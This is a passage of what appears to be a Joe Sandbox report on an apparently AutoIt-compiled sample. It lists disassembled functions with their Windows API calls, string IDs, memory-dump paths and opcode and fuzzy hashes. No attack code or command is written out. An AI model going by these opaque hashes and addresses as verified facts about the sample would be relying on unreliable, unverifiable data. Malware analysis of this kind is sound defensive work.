                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Window$DestroyMove
                                        • String ID: static
                                        • API String ID: 2139405536-2160076837
                                        • Opcode ID: 0cc9a72414f88465047bfdad8a8068298badf5bef14408f69809805c3b270a2b
                                        • Instruction ID: e1c6b3f2accb04a5a0d85a1727f83b4983507e4b9a791499e5b1f3638246d631
                                        • Opcode Fuzzy Hash: 0cc9a72414f88465047bfdad8a8068298badf5bef14408f69809805c3b270a2b
                                        • Instruction Fuzzy Hash: 9A318F71610604AEEB109F64CC80BFB77B9FF48724F109619F9AAD7190DB35AC91EB60
                                        Function 00EE2D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • _memset.LIBCMT ref: 00EE2E00
                                        • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00EE2E3B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: InfoItemMenu_memset
                                        • String ID: 0
                                        • API String ID: 2223754486-4108050209
                                        • Opcode ID: f38df8bb2f7a98ff9bc4a7a88fe41d29ef078233e361307092457ac1c1bb2fcd
                                        • Instruction ID: b662122b55ab7eb96d7080e6607f686acee392371d29d4f2878298eb6f27b56d
                                        • Opcode Fuzzy Hash: f38df8bb2f7a98ff9bc4a7a88fe41d29ef078233e361307092457ac1c1bb2fcd
                                        • Instruction Fuzzy Hash: EA31273160035DABEB268F5AD8847AEBBFDFF05354F14106DEA81B61B0D7709940CB10
                                        Function 00F06943 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00F069D0
                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00F069DB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID: Combobox
                                        • API String ID: 3850602802-2096851135
                                        • Opcode ID: 74f82c9e0b460ee36268822b5eb3146255a4db180e7942e3bec188c6e1f1cf00
                                        • Instruction ID: 0f8857c50993ec1c5245e78c74e565151544931df2cad9fbb3ddca2b7695e11e
                                        • Opcode Fuzzy Hash: 74f82c9e0b460ee36268822b5eb3146255a4db180e7942e3bec188c6e1f1cf00
                                        • Instruction Fuzzy Hash: A611B271B00208AFEF219F14CC90EAB37AAEB993A4F114124F958D72E0D6759C61B7A0
                                        Function 00F06E76 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00E81D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00E81D73
                                          • Part of subcall function 00E81D35: GetStockObject.GDI32(00000011), ref: 00E81D87
                                          • Part of subcall function 00E81D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00E81D91
                                        • GetWindowRect.USER32(00000000,?), ref: 00F06EE0
                                        • GetSysColor.USER32(00000012), ref: 00F06EFA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Window$ColorCreateMessageObjectRectSendStock
                                        • String ID: static
                                        • API String ID: 1983116058-2160076837
                                        • Opcode ID: 1d54f287f626d3e6895483251d7eeac53e0a364263f222633bdec90fd314bf15
                                        • Instruction ID: 54d47c454b28b71431f7c9f5e53a068684329fc2b00dfe6f2daaff23397fc71a
                                        • Opcode Fuzzy Hash: 1d54f287f626d3e6895483251d7eeac53e0a364263f222633bdec90fd314bf15
                                        • Instruction Fuzzy Hash: AA215972A1020AAFDB04DFA8CC45AFA7BB8FB08315F004628FD55D3290E734E861AB50
                                        Function 00F06B8F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetWindowTextLengthW.USER32(00000000), ref: 00F06C11
                                        • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00F06C20
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: LengthMessageSendTextWindow
                                        • String ID: edit
                                        • API String ID: 2978978980-2167791130
                                        • Opcode ID: 65c569085c3fa094f9539c559347e772d8dc05b3cae283b38660a7867bc51240
                                        • Instruction ID: fd3ebeae73eea4e4f925258a866e0b17b991d23423dfb5db5e0b8bc6ef000d34
                                        • Opcode Fuzzy Hash: 65c569085c3fa094f9539c559347e772d8dc05b3cae283b38660a7867bc51240
                                        • Instruction Fuzzy Hash: A111BCB1900208ABEB209E64DC41EFB37AAEB45378F604724F965D71E0C775DCA1BB60
                                        Function 00EE2E9E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • _memset.LIBCMT ref: 00EE2F11
                                        • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00EE2F30
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: InfoItemMenu_memset
                                        • String ID: 0
                                        • API String ID: 2223754486-4108050209
                                        • Opcode ID: 94294c85f6b70a5f5d1752a61eeca6c6f4e3b7b763ed0bdbd750d14b276b96b7
                                        • Instruction ID: c4b10ad28f7740363b8de4cac208e423227b817a890b9f0c20f1f7657af91fbc
                                        • Opcode Fuzzy Hash: 94294c85f6b70a5f5d1752a61eeca6c6f4e3b7b763ed0bdbd750d14b276b96b7
                                        • Instruction Fuzzy Hash: 1311B131E0126CABDB35DE99DC44B9D77BDAB16318F0810A9EE44B72A0D770AD04D791
                                        Function 00EF24CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON
                                        Download Yara Rule
                                        APIs
                                        • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00EF2520
                                        • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00EF2549
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Internet$OpenOption
                                        • String ID: <local>
                                        • API String ID: 942729171-4266983199
                                        • Opcode ID: 7dc327e689e4d17ed3e6073365c6d6228015562bace77012c6cb1af1071a579f
                                        • Instruction ID: c4c52cfd5499096baf7df2a4ecbda51faafa41ca52128c7d4a6750377c8241c7
                                        • Opcode Fuzzy Hash: 7dc327e689e4d17ed3e6073365c6d6228015562bace77012c6cb1af1071a579f
                                        • Instruction Fuzzy Hash: 021106B0501229BADB248F518C95EFBFF68FF05355F10912EF70566040D3709945E6F2
                                        Function 00EF80A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55networkCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00EF830B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00EF80C8,?,00000000,?,?), ref: 00EF8322
                                        • inet_addr.WS2_32(00000000), ref: 00EF80CB
                                        • htons.WS2_32(00000000), ref: 00EF8108
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWidehtonsinet_addr
                                        • String ID: 255.255.255.255
                                        • API String ID: 2496851823-2422070025
                                        • Opcode ID: fd636bc1562f67b99bc8969edf676a54e6a807bdc7366861d61a1ce4a74703c9
                                        • Instruction ID: aa57a58eee1b19afafb4151dd965955abe902a825c38745c48d9e1085d8df0f6
                                        • Opcode Fuzzy Hash: fd636bc1562f67b99bc8969edf676a54e6a807bdc7366861d61a1ce4a74703c9
                                        • Instruction Fuzzy Hash: FC11E535200209ABDB20AF64CD46FFEB364FF04324F109627EA15B7291DF71A805C751
                                        Function 00ED92E7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00E87F41: _memmove.LIBCMT ref: 00E87F82
                                          • Part of subcall function 00EDB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00EDB0E7
                                        • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00ED9355
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: ClassMessageNameSend_memmove
                                        • String ID: ComboBox$ListBox
                                        • API String ID: 372448540-1403004172
                                        • Opcode ID: 92161c7217e280713971fc84d4f4ab21de4d78f4fe759c981e081e3b911ff133
                                        • Instruction ID: 566a32f60a4d24de23741cf861458d5ce7a7c374a802618a895e615e2e1e4479
                                        • Opcode Fuzzy Hash: 92161c7217e280713971fc84d4f4ab21de4d78f4fe759c981e081e3b911ff133
                                        • Instruction Fuzzy Hash: D301D271A05214ABCB04FB60CC918FE73A9FF06320B14261AB976773D2DB3198089750
                                        Function 00ED91DF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00E87F41: _memmove.LIBCMT ref: 00E87F82
                                          • Part of subcall function 00EDB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00EDB0E7
                                        • SendMessageW.USER32(?,00000180,00000000,?), ref: 00ED924D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: ClassMessageNameSend_memmove
                                        • String ID: ComboBox$ListBox
                                        • API String ID: 372448540-1403004172
                                        • Opcode ID: c12793a43875d0bd2b4636b3e1ca762a9b5322cc3ed53355388120825365f4f8
                                        • Instruction ID: 2e27bc6561aae45ac9e85002e92e2336908833457bb8557dbd51ef927b8b4793
                                        • Opcode Fuzzy Hash: c12793a43875d0bd2b4636b3e1ca762a9b5322cc3ed53355388120825365f4f8
                                        • Instruction Fuzzy Hash: 3F01B171A41108ABCB18FBA0C9929EE73E8EF05700F24201AB91A73292EA519E099261
                                        Function 00ED9264 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00E87F41: _memmove.LIBCMT ref: 00E87F82
                                          • Part of subcall function 00EDB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00EDB0E7
                                        • SendMessageW.USER32(?,00000182,?,00000000), ref: 00ED92D0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: ClassMessageNameSend_memmove
                                        • String ID: ComboBox$ListBox
                                        • API String ID: 372448540-1403004172
                                        • Opcode ID: aea556cde3f62b55b8cea3356f03e5d1cdacdfac134f10fe5acc70fe3be80b92
                                        • Instruction ID: b70bdd22ad1fa4a1a04ee45adae530d39773867cd655d36aa76e8abca063edf8
                                        • Opcode Fuzzy Hash: aea556cde3f62b55b8cea3356f03e5d1cdacdfac134f10fe5acc70fe3be80b92
                                        • Instruction Fuzzy Hash: 4E01A771A45108B7CB14FAA0CD82DFF77ECDF11710F242116791A73292DB619E0D9271
                                        Function 00EE51CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: ClassName_wcscmp
                                        • String ID: #32770
                                        • API String ID: 2292705959-463685578
                                        • Opcode ID: 6b4aa6191b8379778273db994dbd6027c667d58647b9b04758029d62d42f6e1e
                                        • Instruction ID: b6e962322e76f6d18968816a71accde0b86be06bb28d58dffdcb13bb562f2778
                                        • Opcode Fuzzy Hash: 6b4aa6191b8379778273db994dbd6027c667d58647b9b04758029d62d42f6e1e
                                        • Instruction Fuzzy Hash: 16E0D17390432D17D7209A969C45F97F7ECEB55771F000157FD14D7050D660E94587D1
                                        Function 00ED81BC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00ED81CA
                                          • Part of subcall function 00EA3598: _doexit.LIBCMT ref: 00EA35A2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Message_doexit
                                        • String ID: AutoIt$Error allocating memory.
                                        • API String ID: 1993061046-4017498283
                                        • Opcode ID: c32b992449d1dfa1c222efc76be23cb395232a710c9e4949cd767af203a2f724
                                        • Instruction ID: 411e81d5640060fc34662775db4e313528688eeced99defcd63e0359d49d8ca2
                                        • Opcode Fuzzy Hash: c32b992449d1dfa1c222efc76be23cb395232a710c9e4949cd767af203a2f724
                                        • Instruction Fuzzy Hash: 63D05B323C531D36D21532B86D07FC676C88B09B55F005056BB0C795D38DD2D9D252DA
                                        Function 00EBB511 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00EBB564: _memset.LIBCMT ref: 00EBB571
                                          • Part of subcall function 00EA0B84: InitializeCriticalSectionAndSpinCount.KERNEL32(00F45158,00000000,00F45144,00EBB540,?,?,?,00E8100A), ref: 00EA0B89
                                        • IsDebuggerPresent.KERNEL32(?,?,?,00E8100A), ref: 00EBB544
                                        • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00E8100A), ref: 00EBB553
                                        Strings
                                        • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00EBB54E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                        • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                        • API String ID: 3158253471-631824599
                                        • Opcode ID: d16fe9ec3f546b76e7e578116dfaad31bc38cd4506517fa84b069e215271830e
                                        • Instruction ID: d33715bc77601c7321cb5f0b3b16dc9631a8965eaf59ae5fa21f921af6a9d119
                                        • Opcode Fuzzy Hash: d16fe9ec3f546b76e7e578116dfaad31bc38cd4506517fa84b069e215271830e
                                        • Instruction Fuzzy Hash: 6AE06D702007148FD770DF68E5043837BE4AF04714F00892CE48AD6651D7F4E508DB62
                                        Function 00F05BEB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00F05BF5
                                        • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00F05C08
                                          • Part of subcall function 00EE54E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00EE555E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: FindMessagePostSleepWindow
                                        • String ID: Shell_TrayWnd
                                        • API String ID: 529655941-2988720461
                                        • Opcode ID: 673fe05ea50f03db7f18c930a8afc85518e1d40aa70ce6a39463b0c6a5affc00
                                        • Instruction ID: e984906d0f86ac1392c1b94d40bf75fb5ef4cb100b1b42e4293a0de04972089e
                                        • Opcode Fuzzy Hash: 673fe05ea50f03db7f18c930a8afc85518e1d40aa70ce6a39463b0c6a5affc00
                                        • Instruction Fuzzy Hash: 50D01232388315B7E778BB71AC0FFE77A54BB10B55F140839B756AA1D0D9E49804D650